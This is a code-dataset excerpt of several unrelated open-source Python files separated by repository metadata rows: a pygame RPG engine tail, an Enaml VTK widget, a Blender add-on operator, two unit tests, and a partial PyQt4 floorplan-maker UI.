self.set_pos(dest_x, dest_y, DOWN) # プレイヤーを移動先座標へ
map.add_chara(self) # マップに再登録
else:
# プレイヤーの場合、キー入力があったら移動を開始する
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_DOWN]:
self.direction = DOWN # 移動できるかに関係なく向きは変える
if map.is_movable(self.x, self.y+1):
self.vx, self.vy = 0, self.speed
self.moving = True
elif pressed_keys[K_LEFT]:
self.direction = LEFT
if map.is_movable(self.x-1, self.y):
self.vx, self.vy = -self.speed, 0
self.moving = True
elif pressed_keys[K_RIGHT]:
self.direction = RIGHT
if map.is_movable(self.x+1, self.y):
self.vx, self.vy = self.speed, 0
self.moving = True
elif pressed_keys[K_UP]:
self.direction = UP
if map.is_movable(self.x, self.y-1):
self.vx, self.vy = 0, -self.speed
self.moving = True
# キャラクターアニメーション(frameに応じて描画イメージを切り替える)
self.frame += 1
self.image = self.images[self.name][self.direction*4+self.frame/self.animcycle%4]
def talk(self, map):
"""キャラクターが向いている方向のとなりにキャラクターがいるか調べる"""
# 向いている方向のとなりの座標を求める
nextx, nexty = self.x, self.y
if self.direction == DOWN:
nexty = self.y + 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nexty += 1 # テーブルがあったらさらに隣
elif self.direction == LEFT:
nextx = self.x - 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nextx -= 1
elif self.direction == RIGHT:
nextx = self.x + 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nextx += 1
elif self.direction == UP:
nexty = self.y - 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nexty -= 1
# その方向にキャラクターがいるか?
chara = map.get_chara(nextx, nexty)
# キャラクターがいればプレイヤーの方向へ向ける
if chara != None:
if self.direction == DOWN:
chara.direction = UP
elif self.direction == LEFT:
chara.direction = RIGHT
elif self.direction == RIGHT:
chara.direction = LEFT
elif self.direction == UP:
chara.direction = DOWN
chara.update(map) # 向きを変えたので更新
return chara
def search(self, map):
"""足もとに宝箱があるか調べる"""
event = map.get_event(self.x, self.y)
if isinstance(event, Treasure):
return event
return None
def open(self, map):
"""目の前にとびらがあるか調べる"""
# 向いている方向のとなりの座標を求める
nextx, nexty = self.x, self.y
if self.direction == DOWN:
nexty = self.y + 1
elif self.direction == LEFT:
nextx = self.x - 1
elif self.direction == RIGHT:
nextx = self.x + 1
elif self.direction == UP:
nexty = self.y - 1
# その場所にとびらがあるか?
event = map.get_event(nextx, nexty)
if isinstance(event, Door):
return event
return None
class MessageEngine:
FONT_WIDTH = 16
FONT_HEIGHT = 22
WHITE, RED, GREEN, BLUE = 0, 160, 320, 480
def __init__(self):
self.image = load_image("data", "font.png", -1)
self.color = self.WHITE
self.kana2rect = {}
self.create_hash()
def set_color(self, color):
"""文字色をセット"""
self.color = color
# 変な値だったらWHITEにする
if not self.color in [self.WHITE,self.RED,self.GREEN,self.BLUE]:
self.color = self.WHITE
def draw_character(self, screen, pos, ch):
"""1文字だけ描画する"""
x, y = pos
try:
rect = self.kana2rect[ch]
screen.blit(self.image, (x,y), (rect.x+self.color,rect.y,rect.width,rect.height))
except KeyError:
print "描画できない文字があります:%s" % ch
return
def draw_string(self, screen, pos, str):
"""文字列を描画"""
x, y = pos
for i, ch in enumerate(str):
dx = x + self.FONT_WIDTH * i
self.draw_character(screen, (dx,y), ch)
def create_hash(self):
"""文字から座標への辞書を作成"""
filepath = os.path.join("data", "kana2rect.dat")
fp = codecs.open(filepath, "r", "utf-8")
for line in fp.readlines():
line = line.rstrip()
d = line.split(" ")
kana, x, y, w, h = d[0], int(d[1]), int(d[2]), int(d[3]), int(d[4])
self.kana2rect[kana] = Rect(x, y, w, h)
fp.close()
class Window:
"""ウィンドウの基本クラス"""
EDGE_WIDTH = 4 # 白枠の幅
def __init__(self, rect):
self.rect = rect # 一番外側の白い矩形
self.inner_rect = self.rect.inflate(-self.EDGE_WIDTH*2, -self.EDGE_WIDTH*2) # 内側の黒い矩形
self.is_visible = False # ウィンドウを表示中か?
def draw(self, screen):
"""ウィンドウを描画"""
if self.is_visible == False: return
pygame.draw.rect(screen, (255,255,255), self.rect, 0)
pygame.draw.rect(screen, (0,0,0), self.inner_rect, 0)
def show(self):
"""ウィンドウを表示"""
self.is_visible = True
def hide(self):
"""ウィンドウを隠す"""
self.is_visible = False
class MessageWindow(Window):
"""メッセージウィンドウ"""
MAX_CHARS_PER_LINE = 20 # 1行の最大文字数
    MAX_LINES_PER_PAGE = 3    # 1ページの最大行数(4行目は▼用)
MAX_CHARS_PER_PAGE = 20*3 # 1ページの最大文字数
MAX_LINES = 30 # メッセージを格納できる最大行数
LINE_HEIGHT = 8 # 行間の大きさ
animcycle = 24
def __init__(self, rect, msg_engine):
Window.__init__(self, rect)
self.text_rect = self.inner_rect.inflate(-32, -32) # テキストを表示する矩形
self.text = [] # メッセージ
self.cur_page = 0 # 現在表示しているページ
self.cur_pos = 0 # 現在ページで表示した最大文字数
self.next_flag = False # 次ページがあるか?
self.hide_flag = False # 次のキー入力でウィンドウを消すか?
self.msg_engine = msg_engine # メッセージエンジン
self.cursor = load_image("data", "cursor.png", -1) # カーソル画像
self.frame = 0
def set(self, message):
"""メッセージをセットしてウィンドウを画面に表示する"""
self.cur_pos = 0
self.cur_page = 0
self.next_flag = False
self.hide_flag = False
# 全角スペースで初期化
self.text = [u' '] * (self.MAX_LINES*self.MAX_CHARS_PER_LINE)
# メッセージをセット
p = 0
for i in range(len(message)):
ch = message[i]
if ch == "/": # /は改行文字
self.text[p] = "/"
p += self.MAX_CHARS_PER_LINE
p = (p/self.MAX_CHARS_PER_LINE)*self.MAX_CHARS_PER_LINE
elif ch == "%": # \fは改ページ文字
self.text[p] = "%"
p += self.MAX_CHARS_PER_PAGE
p = (p/self.MAX_CHARS_PER_PAGE)*self.MAX_CHARS_PER_PAGE
else:
self.text[p] = ch
p += 1
self.text[p] = "$" # 終端文字
self.show()
def update(self):
"""メッセージウィンドウを更新する
メッセージが流れるように表示する"""
if self.is_visible:
if self.next_flag == False:
self.cur_pos += 1 # 1文字流す
# テキスト全体から見た現在位置
p = self.cur_page * self.MAX_CHARS_PER_PAGE + self.cur_pos
if self.text[p] == "/": # 改行文字
self.cur_pos += self.MAX_CHARS_PER_LINE
self.cur_pos = (self.cur_pos/self.MAX_CHARS_PER_LINE) * self.MAX_CHARS_PER_LINE
elif self.text[p] == "%": # 改ページ文字
self.cur_pos += self.MAX_CHARS_PER_PAGE
self.cur_pos = (self.cur_pos/self.MAX_CHARS_PER_PAGE) * self.MAX_CHARS_PER_PAGE
elif self.text[p] == "$": # 終端文字
self.hide_flag = True
# 1ページの文字数に達したら▼を表示
if self.cur_pos % self.MAX_CHARS_PER_PAGE == 0:
self.next_flag = True
self.frame += 1
def draw(self, screen):
"""メッセージを描画する
メッセージウィンドウが表示されていないときは何もしない"""
Window.draw(self, screen)
if self.is_visible == False: return
# 現在表示しているページのcur_posまでの文字を描画
for i in range(self.cur_pos):
ch = self.text[self.cur_page*self.MAX_CHARS_PER_PAGE+i]
if ch == "/" or ch == "%" or ch == "$": continue # 制御文字は表示しない
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH * (i % self.MAX_CHARS_PER_LINE)
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (i / self.MAX_CHARS_PER_LINE)
self.msg_engine.draw_character(screen, (dx,dy), ch)
# 最後のページでない場合は▼を表示
if (not self.hide_flag) and self.next_flag:
if self.frame / self.animcycle % 2 == 0:
dx = self.text_rect[0] + (self.MAX_CHARS_PER_LINE/2) * MessageEngine.FONT_WIDTH - MessageEngine.FONT_WIDTH/2
dy = self.text_rect[1] + (self.LINE_HEIGHT + MessageEngine.FONT_HEIGHT) * 3
screen.blit(self.cursor, (dx,dy))
def next(self):
"""メッセージを先に進める"""
# 現在のページが最後のページだったらウィンドウを閉じる
if self.hide_flag:
self.hide()
# ▼が表示されてれば次のページへ
if self.next_flag:
self.cur_page += 1
self.cur_pos = 0
self.next_flag = False
class CommandWindow(Window):
LINE_HEIGHT = 8 # 行間の大きさ
TALK, STATUS, EQUIPMENT, DOOR, SPELL, ITEM, TACTICS, SEARCH = range(0, 8)
COMMAND = [u"はなす", u"つよさ", u"そうび", u"とびら",
u"じゅもん", u"どうぐ", u"さくせん", u"しらべる"]
def __init__(self, rect, msg_engine):
Window.__init__(self, rect)
self.text_rect = self.inner_rect.inflate(-32, -32)
self.command = self.TALK # 選択中のコマンド
self.msg_engine = msg_engine
self.cursor = load_image("data", "cursor2.png", -1)
self.frame = 0
def draw(self, screen):
Window.draw(self, screen)
if self.is_visible == False: return
# はなす、つよさ、そうび、とびらを描画
for i in range(0, 4):
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (i % 4)
self.msg_engine.draw_string(screen, (dx,dy), self.COMMAND[i])
# じゅもん、どうぐ、さくせん、しらべるを描画
for i in range(4, 8):
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH * 6
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (i % 4)
self.msg_engine.draw_string(screen, (dx,dy), self.COMMAND[i])
# 選択中のコマンドの左側に▶を描画
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH * 5 * (self.command / 4)
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (self.command % 4)
screen.blit(self.cursor, (dx,dy))
def show(self):
"""オーバーライド"""
self.command = self.TALK # 追加
self.is_visible = True
class MoveEvent():
"""移動イベント"""
def __init__(self, pos, mapchip, dest_map, dest_pos):
self.x, self.y = pos[0], pos[1] # イベント座標
self.mapchip = mapchip # マップチップ
self.dest_map = dest_map # 移動先マップ名
self.dest_x, self.dest_y = dest_pos[0], dest_pos[1] # 移動先座標
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "MOVE,%d,%d,%d,%s,%d,%d" % (self.x, self.y, self.mapchip, self.dest_map, self.dest_x, self.dest_y)
class Treasure():
"""宝箱"""
def __init__(self, pos, item):
self.x, self.y = pos[0], pos[1] # 宝箱座標
self.mapchip = 46 # 宝箱は46
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
self.item = item # アイテム名
def open(self):
"""宝箱をあける"""
sounds["treasure"].play()
# TODO: アイテムを追加する処理
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "TREASURE,%d,%d,%s" % (self.x, self.y, self.item)
class Door:
"""とびら"""
def __init__(self, pos):
self.x, self.y = pos[0], pos[1]
self.mapchip = 45
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
def open(self):
"""とびらをあける"""
sounds["door"].play()
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "DOOR,%d,%d" % (self.x, self.y)
class Object:
"""一般オブジェクト"""
def __init__(self, pos, mapchip):
self.x, self.y = pos[0], pos[1]
self.mapchip = mapchip
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "OBJECT,%d,%d,%d" % (self.x, self.y, mapchip)
if __name__ == "__main__":
main()
| mit | 6,963,601,677,123,207,000 | 36.736906 | 124 | 0.533536 | false |
viz4biz/PyDataNYC2015 | enaml/vtk_canvas.py | 1 | 2430 | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import (
List, Typed, ForwardTyped, ForwardInstance, observe, set_default
)
from enaml.core.declarative import d_
from .control import Control, ProxyControl
#: Delay the import of vtk until needed. This removes the hard dependency
#: on vtk for the rest of the Enaml code base.
def vtkRenderer():
from vtk import vtkRenderer
return vtkRenderer
class ProxyVTKCanvas(ProxyControl):
""" The abstract definition of a proxy VTKCanvas object.
"""
#: A reference to the VTKCanvas declaration.
declaration = ForwardTyped(lambda: VTKCanvas)
def set_renderer(self, renderer):
raise NotImplementedError
def set_renderers(self, renderers):
raise NotImplementedError
def render(self):
raise NotImplementedError
class VTKCanvas(Control):
""" A control which can be used to embded vtk renderers.
"""
#: The vtk renderer to display in the window. This should be used
#: if only a single renderer is required for the scene.
renderer = d_(ForwardInstance(vtkRenderer))
#: The list of vtk renderers to display in the window. This should
#: be used if multiple renderers are required for the scene.
renderers = d_(List(ForwardInstance(vtkRenderer)))
#: A VTKCanvas expands freely in height and width by default.
hug_width = set_default('ignore')
hug_height = set_default('ignore')
#: A reference to the ProxyVTKCanvas object.
proxy = Typed(ProxyVTKCanvas)
def render(self):
""" Request a render of the underlying scene.
"""
if self.proxy_is_active:
self.proxy.render()
#--------------------------------------------------------------------------
# Observers
#--------------------------------------------------------------------------
@observe('renderer', 'renderers')
def _update_proxy(self, change):
""" An observer which sends state change to the proxy.
"""
# The superclass handler implementation is sufficient.
super(VTKCanvas, self)._update_proxy(change)
| apache-2.0 | 1,033,791,786,981,308,000 | 30.973684 | 79 | 0.6 | false |
feureau/Small-Scripts | Blender/Blender config/2.91/scripts/addons/bricksculpt_v1-2-0/classes/bricksculpt_choose_paintbrush_material.py | 1 | 2230 | # Copyright (C) 2019 Christopher Gearhart
# [email protected]
# http://bblanimation.com/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# System imports
import bmesh
import math
import importlib
# Blender imports
import bpy
import bgl
from bpy.types import Operator
from bpy.props import *
# Module imports
from .bricksculpt_framework import *
from .bricksculpt_tools import *
from .bricksculpt_drawing import *
from ..functions import *
class BRICKSCULPT_OT_choose_paintbrush_material(Operator):
"""Choose the material of the active BrickSculpt paintbrush tool"""
bl_idname = "bricksculpt.choose_paintbrush_material"
bl_label = "Choose Paintbrush Material"
bl_options = {"REGISTER", "INTERNAL"}
################################################
# Blender Operator methods
@classmethod
def poll(self, context):
scn = bpy.context.scene
return scn.bricksculpt.running_active_session
def execute(self, context):
scn = context.scene
scn.bricksculpt.choosing_material = False
return {"FINISHED"}
def invoke(self, context, event):
return context.window_manager.invoke_props_dialog(self)#, event)
def draw(self, context):
scn = context.scene
layout = self.layout
layout.prop(scn.bricksculpt, "paintbrush_mat")
###################################################
# initialization method
def __init__(self):
bpy.context.window.cursor_set("DEFAULT")
###################################################
# class variables
# NONE!
###################################################
| gpl-3.0 | -3,855,508,242,255,955,000 | 29.135135 | 72 | 0.645291 | false |
SEL-Columbia/commcare-hq | custom/ilsgateway/tests/test_locations_sync.py | 1 | 1228 | import json
import os
from django.test import TestCase
from corehq.apps.commtrack.tests.util import bootstrap_domain as initial_bootstrap
from corehq.apps.locations.models import Location
from custom.ilsgateway.api import Location as Loc
from custom.ilsgateway.commtrack import sync_ilsgateway_location
TEST_DOMAIN = 'ilsgateway-commtrack-webusers-test'
class LocationSyncTest(TestCase):
def setUp(self):
self.datapath = os.path.join(os.path.dirname(__file__), 'data')
initial_bootstrap(TEST_DOMAIN)
for location in Location.by_domain(TEST_DOMAIN):
location.delete()
def test_create_location(self):
with open(os.path.join(self.datapath, 'sample_location.json')) as f:
location = Loc.from_json(json.loads(f.read()))
ilsgateway_location = sync_ilsgateway_location(TEST_DOMAIN, None, location)
self.assertEqual(ilsgateway_location.name, location.name)
self.assertEqual(ilsgateway_location.location_type, location.type)
self.assertEqual(ilsgateway_location.longitude, location.longitude)
self.assertEqual(ilsgateway_location.latitude, location.latitude)
self.assertEqual(ilsgateway_location.parent, location.parent) | bsd-3-clause | 7,645,181,924,802,932,000 | 42.892857 | 83 | 0.740228 | false |
magosil86/ruffus | ruffus/test/test_check_if_uptodate.py | 1 | 3289 | #!/usr/bin/env python
from __future__ import print_function
"""
Test check_if_uptodate
Bug: @parallel sets @check_if_uptodate to None.
Submitted by Jafar Taghiyar (jafar<dot>taghiyar<at>gmail.com)
https://github.com/bunbun/ruffus/issues/53
"""
import os
tempdir = os.path.abspath(os.path.abspath(os.path.splitext(__file__)[0]))
exe_path = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
import sys
# add grandparent to search path for testing
grandparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
sys.path.insert(0, grandparent_dir)
# module name = script name without extension
module_name = os.path.splitext(os.path.basename(__file__))[0]
from ruffus import posttask, parallel, check_if_uptodate, follows, touch_file, pipeline_printout, pipeline_run
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# imports
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
import unittest
import shutil
try:
from StringIO import StringIO
except:
from io import StringIO
def sentinel_file_exists(output_file):
if not os.path.exists(output_file):
return True, "Missing file %s" % output_file
else:
return False, "File %s exists" % output_file
@posttask(touch_file(os.path.join(tempdir, "task1_completed.flag")))
@parallel([[os.path.join(tempdir, "task1_completed.flag")]])
@check_if_uptodate(sentinel_file_exists)
def task1(x):
pass
@follows(task1)
@posttask(touch_file(os.path.join(tempdir, "task2_completed.flag")))
@parallel([[os.path.join(tempdir, "task2_completed.flag")]])
@check_if_uptodate(sentinel_file_exists)
def task2(x):
pass
class Test_ruffus(unittest.TestCase):
def do_assertNotRegexpMatches (self, test_str, re_str):
import re
if re.search(re_str, test_str) is not None:
raise AssertionError("Regexp matched: %r found in %r" % (re_str, test_str))
def do_assertRegexpMatches (self, test_str, re_str):
import re
if re.search(re_str, test_str) is None:
#AssertionError:
raise AssertionError("Regexp didn't match: %r not found in %r" % (re_str, test_str))
def setUp(self):
try:
shutil.rmtree(tempdir)
except:
pass
os.makedirs(tempdir)
def tearDown(self):
try:
shutil.rmtree(tempdir)
except:
pass
def test_ruffus (self):
# run first
pipeline_run(verbose = 0)
# should now be out of date
s = StringIO()
pipeline_printout(s, verbose = 5)
ret = s.getvalue()
try:
self.do_assertRegexpMatches(ret, r"Tasks which are up-to-date:(\n\s*)*Task = 'test_check_if_uptodate.task1'(\n\s*)*Task = 'test_check_if_uptodate.task2'")
except:
print ("\n\tOops: Both tasks should be up to date!!\n\n")
raise
try:
self.do_assertNotRegexpMatches(ret, r"Jobs needs update:\s*No function to check if up-to-date")
except:
print ("\n\tOops: @check_if_uptodate is not being picked up!!\n\n")
raise
if __name__ == '__main__':
unittest.main()
| mit | 4,336,634,337,943,082,000 | 26.638655 | 166 | 0.648221 | false |
ComputerArchitectureGroupPWr/Floorplan-Maker | src/FloorplanMakerUI_old.py | 1 | 15396 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'main_window.ui'
#
# Created: Tue Aug 5 12:46:39 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
from floorplanFrameBeh import FloorplanFrame
from heatersTable import HeatersTable
from thermometersTable import ThermometersTable
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_FloorplanMaker(object):
def setupUi(self, FloorplanMaker):
FloorplanMaker.setObjectName(_fromUtf8("FloorplanMaker"))
FloorplanMaker.resize(1200,700)
self.window = FloorplanMaker
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../icona.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
FloorplanMaker.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(FloorplanMaker)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.thermometers_list = []
self.horizontalLayout_4 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.verticalLayout_3 = QtGui.QVBoxLayout()
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.heaterTabLab = QtGui.QLabel(self.centralwidget)
self.heaterTabLab.setObjectName(_fromUtf8("heaterTabLab"))
self.verticalLayout_3.addWidget(self.heaterTabLab)
self.heaterTable = HeatersTable(self.centralwidget)
self.verticalLayout_3.addWidget(self.heaterTable)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.btnAddHeater = QtGui.QPushButton(self.centralwidget)
self.btnAddHeater.setMaximumSize(QtCore.QSize(71, 27))
self.btnAddHeater.setObjectName(_fromUtf8("btnAddHeater"))
self.horizontalLayout.addWidget(self.btnAddHeater)
self.btnModifyHeater = QtGui.QPushButton(self.centralwidget)
self.btnModifyHeater.setMaximumSize(QtCore.QSize(91, 27))
self.btnModifyHeater.setObjectName(_fromUtf8("btnModifyHeater"))
self.horizontalLayout.addWidget(self.btnModifyHeater)
self.btnDeleteHeater = QtGui.QPushButton(self.centralwidget)
self.btnDeleteHeater.setMaximumSize(QtCore.QSize(81, 27))
self.btnDeleteHeater.setObjectName(_fromUtf8("btnDeleteHeater"))
self.horizontalLayout.addWidget(self.btnDeleteHeater)
self.verticalLayout_3.addLayout(self.horizontalLayout)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_3.addWidget(self.label)
self.tableThermometers = ThermometersTable(self.centralwidget)
self.verticalLayout_3.addWidget(self.tableThermometers)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.btnAddTherm = QtGui.QPushButton(self.centralwidget)
self.btnAddTherm.setMaximumSize(QtCore.QSize(81, 27))
self.btnAddTherm.setObjectName(_fromUtf8("btnAddTherm"))
self.horizontalLayout_2.addWidget(self.btnAddTherm)
self.btnModifyTherm = QtGui.QPushButton(self.centralwidget)
self.btnModifyTherm.setMaximumSize(QtCore.QSize(91, 27))
self.btnModifyTherm.setObjectName(_fromUtf8("btnModifyTherm"))
self.horizontalLayout_2.addWidget(self.btnModifyTherm)
self.btnDelete = QtGui.QPushButton(self.centralwidget)
self.btnDelete.setMaximumSize(QtCore.QSize(81, 27))
self.btnDelete.setObjectName(_fromUtf8("btnDelete"))
self.horizontalLayout_2.addWidget(self.btnDelete)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.gridLayout.setSpacing(6)
self.gridLayout.setContentsMargins(0, 20, 0, 20)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.thermsInRowEdit = QtGui.QLineEdit(self.centralwidget)
self.thermsInRowEdit.setMaximumSize(QtCore.QSize(100, 50))
self.thermsInRowEdit.setObjectName(_fromUtf8("thermsInRowEdit"))
self.gridLayout.addWidget(self.thermsInRowEdit, 0, 1, 1, 1)
self.label_2 = QtGui.QLabel(self.centralwidget)
self.label_2.setMaximumSize(QtCore.QSize(200, 16777215))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_2.setText("Thermometers in row: ")
self.gridLayout.addWidget(self.label_2, 0, 0, 1, 1)
self.columnsInRowEdit = QtGui.QLineEdit(self.centralwidget)
self.columnsInRowEdit.setMaximumSize(QtCore.QSize(100, 16777215))
self.columnsInRowEdit.setObjectName(_fromUtf8("columnsInRowEdit"))
self.gridLayout.addWidget(self.columnsInRowEdit, 1, 1, 1, 1)
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setMaximumSize(QtCore.QSize(200, 16777215))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.label_3.setText("Thermometers in column: ")
self.gridLayout.addWidget(self.label_3, 1, 0, 1, 1)
self.generateButton = QtGui.QPushButton(self.centralwidget)
self.generateButton.setMaximumSize(QtCore.QSize(100, 16777215))
self.generateButton.setObjectName(_fromUtf8("generateButton"))
self.generateButton.setText("Generate")
self.gridLayout.addWidget(self.generateButton, 2, 0, 1, 1)
self.generateActionCombo = QtGui.QComboBox(self.centralwidget)
self.generateActionCombo.setObjectName(_fromUtf8("generateActionCombo"))
self.generateActionCombo.addItem(_fromUtf8("Linear"))
self.generateActionCombo.addItem(_fromUtf8("Net"))
self.gridLayout.addWidget(self.generateActionCombo, 2, 1, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout)
spacerItem = QtGui.QSpacerItem(20, 118, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem)
self.horizontalLayout_3.addLayout(self.verticalLayout_3)
self.verticalLayout_4 = QtGui.QVBoxLayout()
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.floorplanLab = QtGui.QLabel(self.centralwidget)
self.floorplanLab.setObjectName(_fromUtf8("floorplanLab"))
self.verticalLayout_4.addWidget(self.floorplanLab)
self.floorplanScrollArea = QtGui.QScrollArea(self.centralwidget)
self.floorplanScrollArea.setMinimumSize(QtCore.QSize(120, 160))
self.floorplanScrollArea.setMaximumSize(QtCore.QSize(725, 16777215))
self.floorplanScrollArea.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.floorplanScrollArea.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.floorplanScrollArea.setWidgetResizable(True)
self.floorplanScrollArea.setObjectName(_fromUtf8("floorplanScrollArea"))
self.scrollAreaWidgetContents_2 = QtGui.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 584, 701))
self.scrollAreaWidgetContents_2.setObjectName(_fromUtf8("scrollAreaWidgetContents_2"))
self.verticalLayoutWidget = QtGui.QWidget(self.scrollAreaWidgetContents_2)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 481, 591))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.widget = QtGui.QWidget()
self.widgetLayout = QtGui.QHBoxLayout()
self.FrameFloorplan = QtGui.QFrame()
self.FrameFloorplan.setMinimumSize(690,920)
self.FloorPlanFrame = FloorplanFrame(self.FrameFloorplan, self)
self.FloorPlanFrame.setMinimumSize(690,920)
self.FloorPlanFrame.setStyleSheet(_fromUtf8("border: 2px solid black;\n"
"border-radius: 4px;\n"
"padding: 2px;\n"
"background-color: rgb(194, 194, 194)\n"
""))
self.FloorPlanFrame.setFrameShape(QtGui.QFrame.StyledPanel)
self.FloorPlanFrame.setFrameShadow(QtGui.QFrame.Raised)
self.FloorPlanFrame.setObjectName(_fromUtf8("FloorPlanFrame"))
self.widgetLayout.addWidget(self.FrameFloorplan)
self.widget.setLayout(self.widgetLayout)
self.floorplanScrollArea.setWidget(self.widget)
FloorplanMaker.setCentralWidget(self.centralwidget)
self.verticalLayout_4.addWidget(self.floorplanScrollArea)
self.horizontalLayout_3.addLayout(self.verticalLayout_4)
self.horizontalLayout_3.setStretch(0, 2)
self.horizontalLayout_3.setStretch(1, 4)
self.horizontalLayout_4.addLayout(self.horizontalLayout_3)
FloorplanMaker.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(FloorplanMaker)
self.menubar.setGeometry(QtCore.QRect(0, 0, 997, 29))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuPlik = QtGui.QMenu(self.menubar)
self.menuPlik.setObjectName(_fromUtf8("menuPlik"))
self.menuNarz_dzia = QtGui.QMenu(self.menubar)
self.menuNarz_dzia.setObjectName(_fromUtf8("menuNarz_dzia"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
FloorplanMaker.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(FloorplanMaker)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
FloorplanMaker.setStatusBar(self.statusbar)
self.actionOpen_project = QtGui.QAction(FloorplanMaker)
self.actionOpen_project.setObjectName(_fromUtf8("actionOpen_project"))
self.actionSave_project = QtGui.QAction(FloorplanMaker)
self.actionSave_project.setObjectName(_fromUtf8("actionSave_project"))
self.actionClose = QtGui.QAction(FloorplanMaker)
self.actionClose.setObjectName(_fromUtf8("actionClose"))
self.actionNewProject = QtGui.QAction(FloorplanMaker)
self.actionNewProject.setObjectName(_fromUtf8("actionNewProject"))
self.actionOpenProject = QtGui.QAction(FloorplanMaker)
self.actionOpenProject.setObjectName(_fromUtf8("actionOpenProject"))
self.actionSave = QtGui.QAction(FloorplanMaker)
self.actionSave.setObjectName(_fromUtf8("actionSave"))
self.actionEnd = QtGui.QAction(FloorplanMaker)
self.actionEnd.setObjectName(_fromUtf8("actionEnd"))
